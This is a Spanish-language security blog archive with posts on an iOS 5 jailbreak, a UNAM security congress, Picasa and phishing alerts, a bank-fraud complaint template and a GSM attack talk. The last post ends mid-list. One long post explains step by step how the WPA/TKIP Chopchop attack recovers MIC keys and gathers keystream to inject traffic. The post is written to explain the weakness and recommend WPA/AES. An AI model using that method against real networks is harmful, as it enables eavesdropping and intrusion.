Mostrando las entradas con la etiqueta CRACK. Mostrar todas las entradas
Mostrando las entradas con la etiqueta CRACK. Mostrar todas las entradas

jueves, 9 de junio de 2011

Jailbreak de iOS 5 en menos de un día


MuscleNerd, componente del grupo iPhone Dev Team, ha anunciado desde su cuenta de Twitter que ha conseguido hacer el Jailbreak de la recién estrenada beta1 del nuevo iOS 5.

EL nuevo sistema operativo de Apple para los próximos iPhone, iPad e iPod touch fue presentado en la WWDC, con lo que la versión beta del nuevo iOS ya estaría a disposición de un número limitado de desarrolladores. El jailbreak de iOS fue revelado antes de que este cumpliese su primer día desde que fuera presentado de forma oficial (menos de 17 horas).

El jailbreak del sistema operativo implica realizar modificaciones en el sistema (normalmente aprovechando una vulnerabilidad) para poder ejecutar código sin firmar. Oficialmente, con esto se pierde la garantía del teléfono pero a cambio se consigue dotar al dispositivo de características que normalmente tardan en estar disponibles para el sistema o que no llegan a aparecer oficialmente. Además de disponer de una amplia gama de aplicaciones que oficialmente no han sido autorizadas por la compañía.

El jailbreak se ha realizado sobre un iPod Touch de cuarta generación, y para ello se ha utilizado el exploit 'limera1n'. Curiosamente, este exploit ya fue utilizado con anterioridad por GeoHot para liberar el primer iPhone, exclusivo para AT&T, y hacer que pudiera ser utilizado con cualquier operador móvil. 'limeral1n' se aprovecha de una vulnerabilidad presente durante el arranque del sistema, por lo que se trata de un jailbreak 'tethered', es decir, cada vez que se reinicie el dispositivo, será necesario que éste se encuentre conectado a un ordenador que ejecute el código encargado del jailbreak. Por ahora no se ha hecho ninguna referencia a la existencia de un "jailbreak untethered".

Lógicamente, para poder explotar dicha vulnerabilidad era primero necesario hacer correr la nueva versión de iOS, lo que implicaba saltarse las restricciones que permitían que sólo unos pocos desarrolladores pudieran hacerla funcionar. De ello se encargó Mert Erdir, quien ha explicado los sencillos pasos para actualizar la versión de iOS y evadir la pantalla de activación mediante un fallo en el sistema de accesibilidad para personas con discapacidades llamado VoiceOver.

Según Apple, la fecha en la que la versión definitiva del iOS 5 estará disponible para los usuarios será para otoño de este año. Para entonces ya habrán arreglado el agujero por el que se ha conseguido el jailbreak.


Fuente:
http://www.hispasec.com/

Más Información:

Tweet anunciando el jailbreak:
https://twitter.com/#!/MuscleNerd/status/78032693262168064

Cómo actualizar a iOS 5:
http://gizmodo.com/5809621

viernes, 26 de noviembre de 2010

Congreso de Seguridad en Cómputo en México

Del 24 de noviembre al 1 de diciembre se celebra en México el "Congreso Seguridad en Cómputo 2010". Este evento está organizado por la Universidad Nacional Autónoma de México a través de la Subdirección de Seguridad de la Información/UNAM-CERT de la Dirección General de Cómputo y de Tecnologías de Información y Comunicación

El Congreso Seguridad en Cómputo 2010 está dividido en dos fases: capacitación especializada en seguridad de la información y un ciclo de conferencias, impartidas por reconocidos expertos en la materia. La capacitación o líneas de especialización se llevará a cabo del 24 al 29 de noviembre de 2010 y tendrán como sede el Centro de Extensión Tlatelolco. Por otra parte, el ciclo de conferencias tendrá lugar los días 30 de noviembre y 1 de diciembre de 2010 en el Palacio de la Escuela de Medicina.

En las líneas de especialización se cuentan cursos como: "Administración y seguridad en Windows", "Cómputo forense y legislación relacionada", "Técnicas de intrusión y PenTest", "Detección de intrusos y tecnología honeypots" y por último una serie de diferentes talleres.

La parte de conferencias, contará en un primer día con las siguientes exposiciones:
"La seguridad de la información en los procesos de la organización" por David Treviño, "El papel de la industria en la seguridad en Internet" por Julio César Vega, "Combate a los delitos electrónicos en la Policía Federal" por Eduardo Espina García, "Los diez peores errores en seguridad de la información cometidos por la alta dirección de la empresa" por Jesús Torrecillas, "Ocultamiento y persistencia de la información" por Luis Miguel Murguía, "Los nuevos retos del cómputo forense en América Latina" por Andrés Velázquez, "Implementación de seguridad en Bases de Datos" por Johnny Villalobos, "Panel: La protección de datos personales en Internet" con Ivonne Muñoz Torres y Juan Carlos Carrillo.

El miércoles 1 de diciembre, se impartirán las siguientes conferencias: "Vulnerabilidades en módems 2010" por Pedro Joaquín, "Panel: El cómputo forense en la investigación de delitos" con Fausto Estrella y Andrés Velázquez, "Malware Fails" por Tillman Werner y Felix Leder, "Telescopio de seguridad informática" por el UNAM-CERT, "The cloud: exposures, education, jogging" por Raffael Marty, un Panel con Jesús Torrecillas y Fausto Estrella, "La divulgación de los datos personales por medio de Internet: sus consecuencias sociales, informáticas y jurídicas" por David Alfredo Domínguez Pérez y María Natalia Pérez Rul, "Regulation-Deregulation: How compliance regulation get made" por Michael Dahn, "What if…?" por Tillman Werner y Felix Leder y un último Panel "Perspectiva de amenazas de seguridad 2011" por Raffael Marty, Michael Dahn y David Treviño.

Más información sobre los cursos, conferencias y conferenciantes, costos, becas para estudiantes y registro, en la página del evento:
http://congreso.seguridad.unam.mx/

domingo, 7 de marzo de 2010

Un nuevo ataque a WPA/TKIP


Desde que a primeros de noviembre de 2008, Erik Tews y Martin Beck abrieran la caja de Pandora demostrando la viabilidad de capturar información enviada desde un router protegido con WPA/TKIP, se han ido sucediendo pequeños avances en las técnicas utilizadas en dichos ataques yendo desde la inyección de un mayor número de paquetes maliciosos (tal y como se demostró en un paper publicado por unos estudiantes de la universidad de ciencia y tecnología de Noruega en la NorSec Conference celebrada a mediados de octubre de 2009) hasta el último ataque conocido en el que, Matin Beck, vuelve a la carga con un nuevo ataque (PDF) que, gracias a un refinamiento de la técnica utilizada, permite inyectar no solamente un mayor número de paquetes, sino que estos, pueden contener más información.

Haciendo memoria

Recordemos que, TKIP (Temporary Key Integrity Protocol), es una variante de WEP. El hecho de que inicialmente WPA utilizara este sistema -frente al más seguro AES- se debe, simplemente, a una cuestión económica.

En la mayoría de los casos, un router que soportase el protocolo WEP podría ser actualizado por software para soportar el protocolo WPA/TKIP pero, probablemente no a WPA/AES pues, este último, es computacionalmente más exigente que el primero y, por tanto, sería necesario una actualización del hardware -normalmente mediante un cambio de router- con el coste que ello implicaría.

De todas formas, TKIP si que supone un pequeño avance frente a WEP pues, aparte del vector de inicialización del paquete presente en el protocolo WEP (los conocidos como IVs), se utiliza una clave de sesión que, convenientemente "mezclada" con el vector mencionado anteriormente, impide utilizar los ataques conocidos en la actualidad para WEP ya que cada uno de los bytes de un paquete, depende tanto del vector de inicialización como de la clave de sesión. Además de esto -y para evitar ataques basados en la fragilidad de la protección por CRC32 utilizado en WEP-, TKIP implementa dos medidas adicionales: un Message Integrity Check (MIC) de 64 bits incluido en cada paquete a transmitir conocido como "MICHAEL", y un contador de secuencia (TSC) diseñado para asegurar el orden de recepción de los paquetes.

La propuesta inicial de Erik y Martin se basaba en utilizar una variante del ataque Chopchop que describimos en su forma original (orientado al ataque de redes cifradas con WEP) a continuación:

El ataque Chopchop original

Este procedimiento permite a un atacante descifrar los últimos n bytes de información de un paquete mediante el envío de una media de n * 128 paquetes al punto de acceso. La idea se basa en lo siguiente:

En redes protegidas con el protocolo WEP, antes de ser cifrados, los paquetes son modificados de tal forma que se añade un CRC32 conocido como ICV al final del contenido del paquete. A pesar del cifrado posterior, es posible averiguar el valor del último byte de datos del paquete eliminando dicho byte del paquete (truncando el paquete) utilizando una característica presente en la mayoría de los puntos de acceso: si reciben un paquete correcto de un cliente no autenticado, el punto de acceso genera un error, pero, si reciben un paquete con un checksum incorrecto, ese paquete es, sencillamente, descartado. Dado que se ha eliminado un byte basta con mandar a lo sumo 256 paquetes (de media, 128) para averiguar el valor del byte elminado. Una vez conocido el valor del último byte de datos se puede realizar la misma operación con bytes precedentes tantas veces como bytes queramos descifrar.

Contramedidas implementadas en WPA/TKIP

Como se ha comentado anteriormente, TKIP implementa dos contramedidas para evitar ataques como el descrito arriba:

* Si se recibe un paquete con un ICV erroneo, se asume que se ha producido un error en la transmisión y el paquete es descartado. Si, por contra, el ICV es correcto -pero la verificación del MIC fallase-, se consideraría que se está produciendo un ataque y, el punto de acceso, respondería enviando un MIC failure report frame. Si se producen más de dos errores en la validación del MIC en un intervalo de menos de 60 segundos se corta la comunicación y se renegocian todas las claves tras un periodo de penalización de 60 segundos.

* Si un paquete es recibido correctamente -su ICV y su MIC son correctos- se actualizará el contador TSC incrementándose en una unidad. En caso de que el TSC fuese inferior al valor del contador (el paquete habría sido recibido en un orden incorrecto), este sería descartado sin mayores consecuencias.

A pesar de todas estas contramedidas el uso del ataque Chopchop sique siendo viable con TKIP simpre y cuando se haga teniendo cuidado de no "disparar las alarmas".

La cuestión es ¿qué ganamos consiguiendo averiguar los últimos bytes de un paquete cifrado?. En principio podría parecer que la información obtenida es tan pequeña que no tiene ninguna utilidad práctica, sin embargo, pronto veremos que esto no es así.

Atacando WPA

Para empezar, es necesario que el router en el que se ejecute el ataque tenga habilitado QoS de forma que existan varios canales (según la especificación, ocho) por los que transmitir pues, dado que cada canal tiene un contador distinto para el TSC -y el tráfico normalmente siempre circula por el canal 0-, es posible inyectar paquetes con TSCs "bajos" por los siete canales normalmente inactivos sin "levantar sospechas". Es posible por tanto enviar paquetes modificados a aquellos canales con un contador TSC bajo teniendo cuidado, eso si, de no enviar más de dos paquetes con un MIC incorrecto en el intervalo de un minuto.

Supongamos que nos enfrentamos con una red Wi-Fi protegida con WPA/TKIP y que utiliza IPv4 y de la que conocemos el rango de direcciones utilizado (p. ej. 192.168.1.0/24). Adicionalmente, y como hemos visto anteriormente, el router deberá tener activado el QoS y el periodo de regeneración de las claves de la red deberá ser alto (p. ej. 3600 segundos).

Dado este escenario (bastante realista para muchas de las redes desplegadas actualmente), para atacar dicha red sería necesario capturar tráfico hasta detectar un paquete ARP (facilmente distinguible del resto en base a su longitud característica).

Haciendo un inciso -y aunque no es importante para explicar el ataque- es interesante señalar que, en una red Wi-Fi, aunque la comunicación esté cifrada, las direciones MAC tanto origen como destino aparecen en claro y los paquetes son enviados siempre a la dirección de broadcast de la red.

En un escenario como el descrito, se conoce la práctica totalidad del contenido de un paquete ARP, quedando por averiguar el último byte de las direcciónes IP origen y destino, los 8 bytes del MIC y los 4 del checksum ICV. El MIC y el ICV conforman, por tanto, los últimos 12 bytes del paquete.

Teniendo en cuenta que no podemos mandar más de dos paquetes con un MIC incorrecto en el intervalo de un minuto -aunque si que podemos mandar tantos paquetes con un ICV incorrecto como queramos hasta "acertar" pues, siendo incorrectos, serán descartados sin más (sin alterar el valor del TSC del canal) necesitaremos alrededor de 12 minutos para averiguar los 12 bytes que conforman el MIC y el ICV y un par más si queremos averiguar también las direcciones origen y destino del paquete.

Una vez recuperado el MIC y el ICV de un paquete, el atacante puede recuperar la clave utilizada para generar el MIC de dicho paquete -el algoritmo MICHAEL no fue diseñado para ser una función de un solo sentido y es igual de eficiente ejecutarlo "hacia atrás" que "hacia delante"- y, desde ese momento, hasta la resincronización de claves, pueden generarse paquetes "firmados" con la clave MIC obtenida y cuyos 4 bytes ICV correctos podrán averiguarse mediante un ataque Chopchop.

En esta forma, el ataque únicamente permite el envío de tráfico que pueda hacer saltar IDSs que trabajen a nivel de IP o, si el usuario está conectado a Internet, se podría provocar la fuga de información rutando tráfico hacia una máquina externa mediante respuestas ARP falsas.

Por último, a pesar de que con este ataque no es posible descifrar los paquetes de respuesta del cliente transmitidos via Wi-Fi, sería posible obtener dichos paquetes a través de la conexión a Internet mediante la técnica de ARP spoofing descrita anteriormente.

Mejoras introducidas en el nuevo ataque

Una vez aclarado el funcionamiento del ataque original a WPA veremos las novedades aportadas por el nuevo ataque.

La principal mejora es el aumento significativo de información que es posible inyectar en la red pues, con el ataque anterior, en la práctica solamente era posible enviar 28 bytes de información por cada paquete descifrado.

La idea en la que se basa esta mejora es la de la fragmentación de paquetes. La especificación 802.11 permite fragmentar un paquete hasta en 16 partes, sin embargo, TKIP impide reutilizar el keystream de un vector de inicialización dado en más de un fragmento, por lo que es necesario disponer de al menos 16 keystreams distintos para poder transmitir estos. Dado que el ataque explicado anteriormente precisa de 15 minutos para obtener un paquete ARP completo no sería viable utilizar dicho método para llevar a la práctica nuestra idea.

Con el fin de conseguir nuevos keystreams debemos forzar la generación de nuevos paquetes en la red de los cuales conozcamos la mayor cantidad de información. Los paquetes perfectos para esto son los TCP-SYN que, enviados mediante IP spoofing -haciéndonos pasar por el punto de acceso- a un puerto TCP abierto en el cliente, provocarán la respuesta TCP-SYN/ACK a la que el propio punto de acceso, responderá con un paquete TCP-RST generando un nuevo IV dirigido hacia el cliente y que podremos capturar.

Para llevar a cabo esta idea debemos ser capaces de generar un paquete TCP/IP que consistirá en: 8 bytes de cabecera LLC, 20 bytes de cabecera IP y otros 20 de cabecera TCP lo cual nos da 48 bytes de longitud para la MSDU y, a esto, hay que añadirle los 8 bytes del MIC que hacen en total 56 bytes. Asumiendo que disponemos de 8 bytes de keystream para cifrar información, utilizando los siete canales restantes (proporcionados por el QoS del punto de acceso) seremos capaces de cifrar 7 x 8 = 56 bytes por lo que, dado que el envió de un TCP-SYN genera un único TCP-RST, con este método nunca podríamos obtener nuevos bytes de keystream "utilizables".

Necesitamos, por tanto, encontrar una forma de conseguir un mayor número de bytes de keystream que nos permitan inyectar tráfico extra en la red.

Casualmente, muchos sistemas Linux -como los que usan una gran cantidad de routers ADSL- generan paquetes TCP-RST con valores concretos en ciertos campos que nos permitirían obtener un mayor número de bytes de keystream a partir de los paquetes TCP-RST capturados.

Por ejemplo, el ID de dichos paquetes suele ser 0 -por lo que se obtendrían dos bytes extra- de los dos siguientes campos, el byte en el que se indica la fragmentación sería también cero -al no haber más fragmentos- y el de los flags sería, o bien cero, o 0x40 para indicar que no se debe fragmentar el paquete; el siguiente byte -el TTL- probablemente será 0x40 pues es el valor utilizado por defecto en Linux; así mismo, el byte para indicar el protocolo será 0x06 indicando que se usa TCP, las IPs de origen y destino y los puertos TCP serán conocidos así como el número de secuencia que será igual al original incrementado en uno, ...

Siguiendo de forma similar con el resto de los campos del paquete podríamos llegar a obtener hasta 60 bytes de keystream por cada uno de los siete canales libres sin necesidad de fragmentación.

Suponiendo que podamos conseguir todos los requisitos expuestos anteriormente, seríamos capaces de generar 60 nuevos bytes de keystream a la velocidad de la conexión wireless. Incluso, en caso de que el punto de acceso no cumpliese con estos requisitos, si la red a atacar tuviese conexión a Internet y no estuviese filtrado el establecimiento de conexiónes hacia máquinas de Internet, sería viable hacer spoofing de una IP de un sistema externo en el cual tuviésemos control de los paquetes TCP-RST generados lo cual permitiría generar nuevos bytes de keystream aunque, eso sí, la velocidad de generación quedaría limitada a la velocidad de descarga de dicha conexión.


Conclusiones

En resumen, y como se ha comentado inicialmente, este ataque permitiría extraer mucha más información de una red protegida con WPA/TKIP consituyendo un serio problema de seguridad en cuanto a la fuga de datos que ello supone.

Aunque en la práctica este ataque es complejo dado que se necesita la confluencia de un gran número de factores -la red debe estar cifrada con WPA/TKIP que poco a poco va cayendo en desuso, el atacante debe estar a una distancia que le permita inyectar paquetes y el punto de acceso debe tener activado QoS y estar basado en Linux- La forma de evitar este problema es tan simple como utilizar WPA/AES a la hora de configurar una red Wi-Fi.

Dejamos para una futura entrada el analizar el otro avance presentado que, en resumen, es un ataque al código de integridad del mensaje (MICHAEL) que permitiría insertar información en un paquete con datos y MIC desconocidos consiguendo con ello el objetivo de poder descifrar todo el tráfico dirigido hacia el cliente.

Fernando Braquehais
S21sec. e-crime
http://blog.s21sec.com/2010/03/un-nu...Blog+S21sec%29

domingo, 28 de febrero de 2010

Vulnerabilidad de ejecución de código en Google Picasa

Se ha descubierto una vulnerabilidad en Google Picasa por la que un usuario remoto podría lograr la ejecución de código en el sistema de los usuarios.

Picasa es un software de tratamiento y gestión de fotografías de Google, con el que se puede organizar, editar e imprimir las fotos del ordenador.

El problema consiste en que un usuario remoto podría crear una imagen en formato jpeg de tal forma, que cuando fuera cargada por el usuario atacado y este realice cualquier acción se provoque un desbordamiento de entero en "PicasaPhotoViewer.exe" y la ejecución de código en el sistema del usuario. El código se ejecutará con los privilegios del usuario.

Aunque no ha realizado ninguna comunicación al respecto, Google ha publicado una versión que corrige el problema (3.6 build 105.41).


Google Picasa Integer Overflow in Processing JPEG Images Lets Remote Users Execute Arbitrary Code
http://securitytracker.com/alerts/2010/Feb/1023652.html

lunes, 22 de febrero de 2010

Ataques de phishing constantes sobre bancomer

Aqui tenemos un nuevo ejemplo de ataques de phishers, para que se den una idea de lo sencillo que es armar este tipo de estafas... y lo sencillo que es caer en este tipo de anzuelos, ya que no falta cada desprevenido que deja sus cuentas por todos lados.

Veamos,

Sitio web del atacante
 

Sitio web de bancomer

 

Chequen la diferencia, en el sitio web atacante se puede ver la URL: http://208.53.181.167/homemenu/
A diferencia de la pagina oficial de bancomer: http://www.bancomer.com/

Y el anzuelo es un email como este:


 

Bueno, asi que mucho cuidado con andar proporcionando datos en sitios... aunque digan gusanito, bancomer, banamex, msn, o lo que diga,,, aguas. 
Porque si te modificaron el archivo host ni cuenta te vas a dar, saludos...

domingo, 21 de febrero de 2010

Ataque de phishing a traves de difusion directa de mensaje

Un mensaje con el tecto “lol, is this you” se está expandiendo rápidamente por la red de twitter y enlazando al sitio llamado "bzpharma", no hagas clic en el enlace.

Usuarios que entren e introduzcan información de su cuenta dejan expustos sus datos a una red de spammers, eviten registrarse en sitios sólo por curiosidad...

Twitter ya está al pendiente de esta situación, pero hay miles de casos similares.

miércoles, 3 de febrero de 2010

Miles de usuarios de Bancomer y Banamex han sido defraudados

Hola a todos, el motivo de éste post es denunciar públicamente el atraco que miles de usuarios de cuentas de nómina han sufrido el pasado fin de semana.
Y me interesa divulgar ésto, porque mi madre ha sido uno de los afectados a ella le retiraron su sueldo semanal, pero hay personas que les retiraron toda su quincena, o lo que tenían ahorrado en la cuenta incluyendo el pago de sus vacaciones.

Según los mismos tarjetahabientes que han sufrido éste tipo de problemas, lo que se debe hacer es interponer una denuncia ante el banco y solicitar una aclaración y no confiarse en ellos.
Posteriormente deben interponer una queja ante la CONDUSEF, esperando que alguien los atienda ya que muchas veces no sirve de nada, sólamente hacen perder el tiempo y no obligan a los bancos a nada.
Es de suma importancia interponer una denuncia ante la PGR, ya que es de carácter federal; a continuación se muestra el formato de denuncia.

A CONTINUACION, EMPIEZA EL FORMATO DE DENUNCIA:






SE INTERPONE QUERELLA Y/O DENUNCIA DE HECHOS DELICTIVOS.


PROCURADURIA GENERAL DE LA REPUBLICA,
C. AGENTE DEL MINISTERIO PUBLICO FEDERAL,
P R E S E N T E.-
_____(SU NOMBRE)________________________________, mexicano, mayor de edad, por mi propio derecho, señalando como domicilio para oír y recibir notificaciones y documentos que se originen con motivo de la presente el ubicado en __________(dirección de su domicilio y/o oficina o el de su abogado)___________, AUTORIZANDO como coadyuvante de esta Representación Social y/o mi representante legal a los Ciudadanos Civiles ______(nombre del abogado que podrá auxiliarle en su caso)____________________________________con el debido respeto comparezco para exponer.-
Que por medio del presente escrito con fundamento en los artículos 1º, 91, 113 bis de la Ley de Instituciones de Crédito, 400 bis del Código Penal Federal y demás relativos así como en atención al derecho de petición y garantía de la reparación del daño, vengo a presentar formal denuncia de hechos y/o querella por los delitos tipificados por el articulo 113 bis de la Ley de Instituciones de Crédito (apoderamiento ilícito del dinero de los clientes de una institución de crédito), 400 bis del Código Penal Federal (lavado de dinero), FRAUDE, ENCUBRIMIENTO, y los demás que resulten cometidos en mi perjuicio en contra de la institución de crédito que lleva por nombre comercial BBVA BANCOMER y en contra de quien o quienes mas resulten responsables como sujetos activos de los delitos que vengo a denunciar.
Lo anterior dado los siguientes:
H E C H O S :




Que en fecha __________(fecha de la apertura de su cuenta de cheques de donde le desaparecieron el dinero)___ abrí una cuenta de cheques mediante contrato de deposito que celebre con el banco BBVA BANCOMER sucursal ________(nombre de la sucursal)____________________ misma que se ubica en la ciudad de ______________________ en el siguiente domicilio ___________________________. Para tales efectos, deposite ante dicha institución de crédito la cantidad de $_________________________ firmando el contrato respectivo en mi carácter de depositante y el SR. _____(nombre del funcionario que firmo el contrato por parte del banco)________________________. El numero de la cuenta es __________________________.
Que en fecha ________________________________ el banco, por conducto de su funcionario el Sr. ______________________________ me entrego una tarjeta de __(señalar crédito o debito)___________________ para poder hacer retiros de dinero de la cuenta numero ________________________________.
Que en fecha ___________(cuando se da cuenta de los faltantes de $)_________________________ me percate de que de la cuenta numero _______________________________ descrita en el hecho numero I, había un faltante de $_______(cantidad robada)___________________________ mismos que el suscrito nunca retire ni mediante cheques ni retiros de cajero ni traspaso electrónico alguno. (incluya lo siguiente en caso de que aplique:) siendo el caso que JAMAS HE AUTORIZADO A PERSONA ALGUNA NI A CUENTA BANCARIA ALGUNA PARA QUE PUEDA HACER RETIROS DE MI CUENTA BANCARIA NUMERO _________________________________.
Que en fecha ______________________________________ acudí a la institución de crédito BBVA BANCOMER donde abrí la cuenta de cheques mediante contrato de deposito y me entreviste con el Sr. ______(nombre del funcionario quien le atendió o no)___________________________ y le hice saber lo que había sucedido en mi __________cuenta bancaria y/o tarjeta de crédito_____ a lo que me manifestó que: _________(que el banco no era responsable y que el único responsable era yo)_____(manifieste aquí los pretextos que le dieron y de ser posible los nombres y números de cuenta a donde fueron a parar sus dineros o el dinero que le acredito el banco por medio de la tarjeta de crédito)________________________________________________________ _______________________________________________________________________________________.
Que a la fecha, la institución de crédito no me ha justificado a donde ni a quien fueron a dar los dineros que fueron ______(retirados y/o traspasados)_____________ NO OBSTANTE QUE EN DICHA SUCURSAL BANCARIA HAY UN CAJERO PRINCIPAL QUIEN LLEVA CONTROLES DOCUMENTADOS DE TODOS Y CADA UNO DE LOS MOVIEMIENTOS BANCARIOS QUE SE REALIZAN A DIARIO EN LAS CUENTAS BANCARIAS ABIERTAS EN DICHA SUCURSAL INCLUYENDO LA de mi cuenta bancaria numero ________________________ siendo que resulta ilógico y por demás absurdos los pretextos que a la fecha me han venido dando los sres. ________(nombre de los funcionarios bancarios que le dan pretextos en la sucursal bancaria)___________________________.
Que por los hechos que narrado, a la fecha mi patrimonio económico ha sufrido un daño por la cantidad de $_________________________________________________ mismos que ahora el banco BBVA BANCOMER no ha querido devolver al suscrito.


Dados los antecedentes narrados en los párrafos anteriores, es que me veo en la necesidad de promover la presente denuncia ya la persona que se haya apoderado de los dineros de mi cuenta bancaria numero _____________________________ que tengo en BBVA BANCOMER lo hizo incurriendo en el delito previsto y sancionado por el articulo 113 bis de la Ley de Instituciones de Crédito siendo que por el hecho de que el banco BBVA BANCOMER por conducto de sus funcionarios me ha negado información sobre la desaparición de mis dineros incurren a su vez en el ENCUBRIMIENTO de dicho delito haciéndolos a la vez coparticipes de los delitos que vengo a denunciar y/o querellarme. No omito manifestar que quien o quienes hayan recibido los dineros del suscrito también han incurrido en concurso con aquel delito tipificado por el 113 bis de la Ley de Instituciones de Crédito en aquel tipificado por el articulo 400 bis del Código Penal Federal (lavado de dinero) al estar obteniendo bienes (como lo es el dinero) de manera ilícita y obviamente procurando esconder la procedencia de los mismos (que lo es un ilícito) al igual que emplear los dineros robados del suscrito obviamente en la adquisición de otros bienes sin que para ello exista una obtención licita de los dineros usados para tal efecto.
P R U E B A S :





DOCUMENTAL PRIVADA.- consistente en contrato de deposito numero ______(su numero de contrato de la cuenta de donde le robaron)_________________________ relativo al hecho marcado con el numero I, solicitando quede en su lugar copia certificada del mismo y se me regrese el original. Con este medio de prueba acredito mi interés jurídico y la legitimación activa para denunciar el delito previsto y sancionado en el artículo 113 bis de la Ley de Instituciones de Crédito.
DOCUMENTAL PRIVADA.- Consistente en estado de cuenta de fecha relativo a la cuenta bancaria numero _____________________ que abrí en BBVA BANCOMER, cuenta bancaria de la cual me robaron mis dineros, solicitando quede en su lugar copia certificada del mismo y se me regrese el original. Con este medio de prueba se acreditan los faltantes que hay en mi cuenta bancaria. (hay que hacer un párrafo marcado con inciso por cada estado de cuenta que pueda servir en la investigación).
OFICIO DE INFORMACION EN RESPUESTA.- De aquel que se sirva girar esta Honorable Representación Social en representación del suscrito denunciante y/o querellante con fundamento en el articulo 117 fracción I de la Ley de Instituciones de Crédito y sus debidos apercibimientos, acompañando para tales efectos copia certificada del contrato de deposito de la cuenta bancaria numero ______(cuenta de donde robaron sus dineros)_____________________ que abrí en BBVA BANCOMER sucursal _________(nombre de la sucursal y dirección de la misma)______________ a dicha Sucursal bancaria y/o a la Comisión Nacional Bancaria y de Valores a efecto de que se determinen los siguientes datos:




1. nombre del titular, institución bancaria y numero de cuenta a donde fue destinado el movimiento bancario en transferencia señalado en el estado de cuenta de fecha ___________________________ de mi cuenta bancaria numero __________________________ valioso por la cantidad de $_____________________________. Con este medio de prueba se acreditara fehacientemente la persona que se haya apoderado ilícitamente de mis dineros. (hacer párrafos iguales y numerados por cada movimiento ilícito de dineros haciendo referencia individual de cada movimiento en caso de contar con estados de cuenta donde estos aparezcan.)


TESTIMONIAL.- A cargo del Sr. ______(nombre del director de la sucursal bancaria donde se abrió la cuenta)__________________ en su carácter de director de la sucursal __________________- del banco BBVA BANCOMER y del Sr. _________(nombre del cajero principal) _________________ en su carácter de Cajero(a) principal de las misma sucursal bancaria. Este medio de prueba resulta necesario a efectos de que estas personas en su calidad de testigos declaren en relación a los movimientos ilícitos que se verificaron en mi cuenta bancaria y toda vez que en BBVA BANCOMER, el Cajero principal es quien documenta a diario las operaciones bancarias que se verifican en cada cuenta bancaria abierta por los clientes en dicha sucursal bancaria, por lo que estos forzosamente tienen conocimiento sobre los movimientos ilícitos de mis cuentas bancarias mismos que he venido a denunciar.
LOS DEMAS MEDIOS DE PRUEBA QUE SE SIRVA DESAHOGAR ESTE REPRESENTANTE SOCIAL.

Por lo anterior expuesto y fundado ante esta Procuraduría General de la Republica, atentamente pido.-
PRIMERO.- SE ME TENGA INTERPONIENDO LA PRESENTE QUERELLA Y/O DENUNCIA POR LOS DELITOS Y EN CONTRA DE LAS PERSONAS SENALADAS EN EL PROEMIO DEL PRESENTE ESCRITO.
SEGUNDO.- SE ORDENE LA RATIFICACION DE LA PRESENTE DENUNCIA Y/O QUERELLA.
TERCERO.- SE ORDENEN LAS DILIGENCIAS NECESARIAS A EFECTO DE ESCLARECER LOS HECHOS DELICTIVOS COMETIDOS EN MI PERJUICIO.
CUARTO.- INTEGRADA QUE SEA LA PRESENTE AVERIGUACION, SE CONSIGNE ANTE EL JUEZ DE DISTRITO EN TURNO.

MEXICO, D. F. A _____ DEL MES DE _____________, 2006.



(SU FIRMA)
__________________________________________
(SU NOMBRE COMPLETO)




Además hacer una denuncia ante el ministerio público, donde deberán hacer una narración de los hechos y levantar la denuncia a nombre de "BBVA Bancomer o quien resulte responsable".

Hay que regresar a ratificar la denuncia personalmente, dos semanas después y es muy importante hacerlo ya que rara vez te llaman.
Una vez que ya sepas esto, solicita lo siguente:


1.-PROCEDIMIENTO INICIAL A SEGUIR POR EL MINISTERIO PÚBLICO


El ministerio tiene que hacer un oficio a la COMISION NACIONAL BANCARIA DE VALORES En donde solicite, que le pida a Bancomer los siguientes datos: Detalle de operación
Con hora, fecha, titular afectado, titular beneficiado
Reporte electrónico
DNS
Dirección IP
Nota: Para saber que significan todos estos datos, entra a la Lista de Definiciones

Solicitarle a la comisión, que requiera el nombre a quien se hizo los traspasos, con copia del contrato y su identificación, para que después el ministerio determine si interroga a dicha persona.

El Banco lo primero que hace, es negar la información, argumentando que según el Art. 117, esa información es secreto bancario

Pero se le responde, que el secreto bancario no existe para el titular de la cuenta (no puede haber secretos de la cuenta para un titular).


ES MUY IMPORTANTE LA DENUNCIA AL MINISTERIO PUBLICO, PORQUE SI NO LA HACES, Y EL BANCO TE RESPONDE QUE NO TE VA A REGRESAR TU DINERO, ENTONCES, EL BANCO PODRA DECIRTE, EL POR QUE NO LA HICISTE, CUANDO LE RECLAMES ALGO, CON ALGUNA OTRA AUTORIDAD.

Ademas, de que esto sirve como sustento de los hechos.

Cifras. Miles de usuarios fueron afectados este fin de semana, es de vital importancia denunciar ya que en caso contrario, el banco se cruzará de brazos y con el apoyo de las autoridades sólo se haran pendejos, mucho ojo.

Diario el noroeste
Reclaman los 'robos' de fondos en tarjetas
http://noroeste.com.mx/publicaciones.php?id=553673

Diario debate
Cientos de tarjetahabientes son defraudados esta semana
http://www.debate.com.mx/eldebate/Articulos/ArticuloGeneral.asp?IdArt=9573436&IdCat=6096

Robos bancarios
http://www.robosbancarios.com/

Soporte

miércoles, 20 de enero de 2010

La red 3G GSM ha sido vulnerada, asi es hay un fallo de seguridad



Si hay algo que ha sido relevante este año en el CCC, han sido los ataques a GSM, y entre ellos la gran noticia ha sido el anuncio de la rotura de su cifrado en la charla de Chris Paget (con tacones de plataforma rojos) y Karsten Nohl.

La charla tenía en realidad dos partes, cada una sobre una de las dos principales debilidades de la red GSM, que es incluso más grande que Internet en términos de tamaño y nodos conectados.

En la primera parte, acerca de los ataques que posibilita el hecho de que el teléfono no autentique a la red y por tanto, se pueda poner una estación base emulada que haga creer a cualquier teléfono que se está conectando a la red de verdad y capturar todo su tráfico. Estos ataques tienen el inconveniente de que al ser activos, si alguien los busca, encontrará al atacante, a pesar de que normalmente, nadie los busca.

En realidad, las herramientas mostradas (el "Universal Software Radio Peripheral", USRP, junto con un software denominado OpenBTS que emula la parte radio de la red) son todavía capaces de ataques bastante rudimentarios, limitados a la captura de los IMSI, un número identificador del teléfono, que no es visible al usuario y que puede ser utilizado para ataques de denegación de servicio (no es posible suplantarle sin tener acceso físico al SIM, y aún así para suplantar a un usuario se requiere poner el SIM en un microscopio electrónico y dejarlo prácticamente inutilizable).

Pero lo que sí muestra es la evidencia de que en ausencia de pruebas de seguridad, los teléfonos existentes hoy en día tienen una gran cantidad de defectos en el software, y una gran vulnerabilidad a ataques:

  • Por ejemplo, aunque lo normal es que los iPhones no se conecten al OpenBTS, en USA se encontraron uno que insistía en conectarse a ellos, a pesar de que emitían como una red de prueba que no existe, emitían en una banda que en USA no se usa y usando la mínima potencia posible.
